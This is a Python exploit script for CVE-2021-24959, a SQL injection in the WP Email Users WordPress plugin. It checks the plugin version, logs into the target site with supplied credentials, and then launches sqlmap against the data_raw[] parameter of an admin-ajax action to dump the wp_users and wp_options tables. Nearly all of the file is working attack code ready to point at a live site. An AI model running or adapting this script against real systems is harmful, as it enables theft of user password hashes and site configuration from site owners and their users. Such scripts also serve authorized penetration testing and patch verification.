#!/usr/bin/env python3 import argparse import requests import re from getpass import getpass import os import subprocess ## Exploit script by @RandomRobbieBF http_proxy = "" os.environ['HTTP_PROXY'] = http_proxy os.environ['HTTPS_PROXY'] = http_proxy user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" def check_plugin_version(url,username,password): headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'} plugin_url = ""+url+"/wp-content/plugins/wp-email-users/readme.txt" response = requests.get(plugin_url, headers=headers,verify=False,timeout=30) if response.status_code == 200: content = response.text version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None) if version_line: version = version_line.split(':')[1].strip() if version > '1.7.7': print("The plugin version is 1.7.7 or above.") exit() else: print("The plugin version is below 1.7.7.") print("The plugin version is "+version+"") return version else: print("Failed to find the version information in the readme.txt file.") exit() else: print("Plugin not installed") exit() def vulncheck(url, username, password): # Perform vulnerability check logic here print("Vulnerability check:", url) # Login to WordPress login_url = f"{url}/wp-login.php" session = requests.Session() login_data = { "log": username, "pwd": password, "wp-submit": "Log In", "redirect_to": f"{url}/wp-admin/", } try: login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent}) login_response.raise_for_status() # Extract the required cookies from the response headers cookies = login_response.cookies # Confirm successful login if any('wordpress_logged_in' in cookie.name for cookie in session.cookies): cookies = session.cookies print("Logged in successfully.") cookie_string = "; ".join([f"{name}={value}" for name, value in cookies.items()]) command = 'sqlmap.py -u "'+url+'/wp-admin/admin-ajax.php" --data="data_raw%5B%5D=&action=weu_selected_users_1" --time-sec=10 --threads 4 --batch -p data_raw[] -T wp_users,wp_options --dump --referer="'+url+'/wp-admin/" --level 3 --risk 3 --technique=BT --dbms=mysql --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" --cookie "'+cookie_string+'"' print("Command Line: "+command+"") try: process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True) for line in iter(process.stdout.readline, ''): print(line.strip()) process.communicate() # Wait for the command to complete if process.returncode != 0: print(f"Command execution failed with error code {process.returncode}.") except subprocess.CalledProcessError as e: print(f"Command execution failed with error code {e.returncode}.") print(e.output) else: print("Failed to log in.") exit() except requests.exceptions.RequestException as e: print(f"Request failed with an error: {e}") # Add the vulnerability description as a comment DESCRIPTION = """ WP Email Users <= 1.7.6 - SQL Injection Description: CVE-2021-24959 The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks. """ # Use argparse to get the URL, username, and password arguments parser = argparse.ArgumentParser(description=DESCRIPTION) parser.add_argument("-u", "--url", help="Website URL", required=True) parser.add_argument("-un", "--username", help="WordPress username") parser.add_argument("-p", "--password", help="WordPress password") args = parser.parse_args() # Prompt for password if not provided as an argument if not args.password: args.password = getpass("Enter the WordPress password: ") check_plugin_version(args.url, args.username,args.password) vulncheck(args.url, args.username, args.password)